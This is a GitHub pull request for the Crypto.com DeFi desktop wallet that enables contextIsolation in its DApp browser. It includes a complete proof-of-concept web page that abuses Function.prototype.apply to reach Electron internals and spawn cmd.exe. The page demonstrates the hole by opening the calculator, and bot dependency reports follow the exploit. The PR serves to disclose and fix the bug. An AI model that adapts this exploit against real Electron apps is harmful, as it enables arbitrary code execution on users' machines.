search

crypto-com / chain-desktop-wallet

Crypto.com DeFi Desktop Wallet
https://crypto.com/defi-wallet
Other
363 stars 112 forks source link

feat: enable contextIsolation in DAppBrowser #1419

Closed XinyuCRO closed 4 months ago

XinyuCRO commented 4 months ago

Background

Test hosting a script as below: (opening the calculator app on Windows)

<!DOCTYPE HTML>
<html>
<h1>test</h1>
<script>
var apply1 = [];
var call1 = [];

Function.prototype._apply = Function.prototype.apply //store original apply prototype
Function.prototype.apply = function(...r) {
    for (var i = 0; i < r.length ; i++ in r) {
        apply1.push(r[i]);
        console.log(r[i]);
    }
};
function rce() { //restore original apply function prototype and execute cmd.exe with arbitrary arguments (/c calc)
    Function.prototype.apply = Function.prototype._apply;
    for (i=0; i<apply1.length; i++) {
        try {
            apply1[i].binding('spawn_sync').spawn({file:"C:\\windows\\system32\\cmd.exe",args:["/c calc"],stdio:[{type:"pipe",readable:!0,writable:!1},{type:"pipe",readable:!1,writable:!0},{type:"pipe",readable:!1,writable:!0}]});
            break;
        } catch(er) {
            console.log(er);
            setTimeout(function(){
                rce()
            },'5000')
        }
    }
};

function leak_process() { //generate enough event listeners to trigger process.warning()
    for (a=0; a<apply1.length; a++) {
        if (apply1[a].addListener) {
            for (i=0; i<11; i++) {
            apply1[a].addListener('x',function(ev){});
            }
        rce();
        break;
        }else {
            continue;
        }
    };
}
setTimeout(function(){
    leak_process();
},'4000');
</script>
</html>

The app will pops up with the Calculator app.

Attempts to fix

socket-security[bot] commented 4 months ago

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package New capabilities Transitives Size Publisher
npm/xmldom@0.5.0 None 0 88.7 kB brodybits

🚮 Removed packages: npm/sleep@6.3.0, npm/zxcvbn@4.4.2

View full report↗︎

socket-security[bot] commented 4 months ago

👍 Dependency issues cleared. Learn more about Socket for GitHub ↗︎

This PR previously contained dependency changes with security issues that have been resolved, removed, or ignored.

View full report↗︎